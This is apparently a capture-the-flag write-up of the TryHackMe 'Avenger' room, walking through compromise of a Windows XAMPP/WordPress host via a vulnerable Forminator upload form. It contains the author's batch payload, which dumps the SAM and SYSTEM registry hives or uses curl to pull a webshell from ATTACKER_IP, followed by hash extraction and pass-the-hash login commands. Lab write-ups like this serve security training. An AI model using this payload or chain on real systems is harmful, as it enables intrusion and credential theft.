🦸‍♂️TryHackMe - Avenger Walk through / Write-up

Shortest Path to Admin! No reverse shell needed, no fiddling with AV, no need to use mimikatz, no need to do privilege escalation.

AVengerTryHackMe

Be an avenger!

Disclaimer : This no longer works, because the vulnerability was so bad they had to patch it

But if you wanna learn about it, feel free to read it. Else check out one my friend's write-up

AVenger | Writeups0xb0b.gitbook.io

Table of contents

• Recon

• Weaponization

• Delivery

• Exploitation

  • Get User Flag

  • Get the Root flag

---

Recon

We first, start off with port scanning, with rust scan, you may use nmap if you like!

rustscan -a TARGET_IP -- -A -sC

rustscan output

PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-title: Index of /
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      syn-ack Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a44cc99e84b26f9e639f9ed229dee0
| SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Index of /
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-27T14:58:56
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 34070/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 30527/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 20406/udp): CLEAN (Timeout)
|   Check 4 (port 49744/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

As we can see, there is just too many ports open, but our taget is the web port!, I am gonna try to make this writeup as short as possible.

Visiting the default port 80, we get this page!

Xampp server running

Now visiting the dashboard we can only get the phpinfo page from there, but it's not much of a help, so we can try to get the gift endpoint.

It does not load at first instance! gives of an error that its unable to load the page, however look at the url tab.

check the url tab

Now edit your host file so that you can access the site, for example edit your host file as the following

/etc/hosts

  target_ip avenger.tryhackme

Now you should be able to access the site. It will take some time to load, since it's a windows machine.

Once loaded, it gives us a wordpress powered site. Use wpscan for enumerating vulnerabilites in the wordpress!

wpscan - plugin enumeration

[+] forminator
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
 | Last Updated: 2023-11-13T09:11:00.000Z
 | [!] The version is out of date, the latest version is 1.28.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.24.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt

A simple googling will lead us to the following exploit against forminator

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command ExecutionExploit Database

forminator exploit

As per the notes in expoit db, we can upload any kind of file on the server, lets try something, use the following training request form to upload your batch file, since we are targeting windows, and it is already mentioned that Antivirus is enabled, we need to be carefull about it.

form for requesting training

So we will not be using any reverse shell for this case, but rather a simple webshell, best webshell is powny shell

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

Powny shell

Download the shell.php in your current directory, and prepare your setup.

I have already enumerated the forminator plugin, and I could not find any valid endpoint where the file gets stored, so don't worry about a reverse shell. Since the backend process will check each message carefully we can expect this attack vector as a simple phishing attack, where we upload a malacious file and it gets executed.

---

Weaponization

Since we know that the target server is likely using xampp, we can think of its absolute default path as the following:

Default xampp server path

C:\xampp\htdocs

Now we will craft a simple batch file which will check if the user/process that will execute our program is running as "nt /authourity" or not, if its not then download a webshell in htdocs directory, else get the SAM files. Do change the ATTACKER_IP in the script, modify it as per your needs.

getsam.bat

@echo off

:: Check if the current user is NT AUTHORITY\SYSTEM
whoami /groups | find "S-1-5-18" > nul

if %errorlevel% equ 0 (
    :: Run commands for NT AUTHORITY\SYSTEM
    reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
    reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
) else (
    :: Run commands for other users
    curl http://ATTACKER_IP/powny.php -o C:\xampp\htdocs\shell.php
)

---

Delivery

Now start the python server in your directory.

Start the server

python -m http.server 80 .

Upload the batch file!

Upload the batch file

Look for the web request in your python server.

Wait for the server to send the file!

And you have your shell on the server!

shell.php in htdocs

Exploitation

VIsit the shell.php, and you will have a powny shell ready for you.

check out the shell!

As you can see, if we type whoami, we are admin!

That means we can do whatever we want, like disabling Anti-Virus as well, but we dont need to that. Just get the SAM files, and we will get the admin hashes, later use them to gain access to the system.

use these commands

reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak
reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak

Now check the root directory, it should have those registry backups

Get the files now.

get the sam files

wget http://avenger.tryhackme/system.bak
wget http://avenger.tryhackme/sam.bak

Since you have the most sensitive files of the server, now use impacket to get the admin hashes

Dump the admin hashes

impacket-secretsdump -sam sam.bak -system system.bak local

admin hash

Now since you have admin hash, use evil-winrm to login using pass the hash technique!

Evil Winrm

evil-winrm -u Administrator -H ADMIN_HASH -i TARGET_IP

get access!

Look Ma! no privesc 😂

Get User Flag

Get user flag!

Get the Root flag

Get root flag!

Thank you for reading my article ❤️ Happy Hunting 😎, feel free to connect with me on Linkedin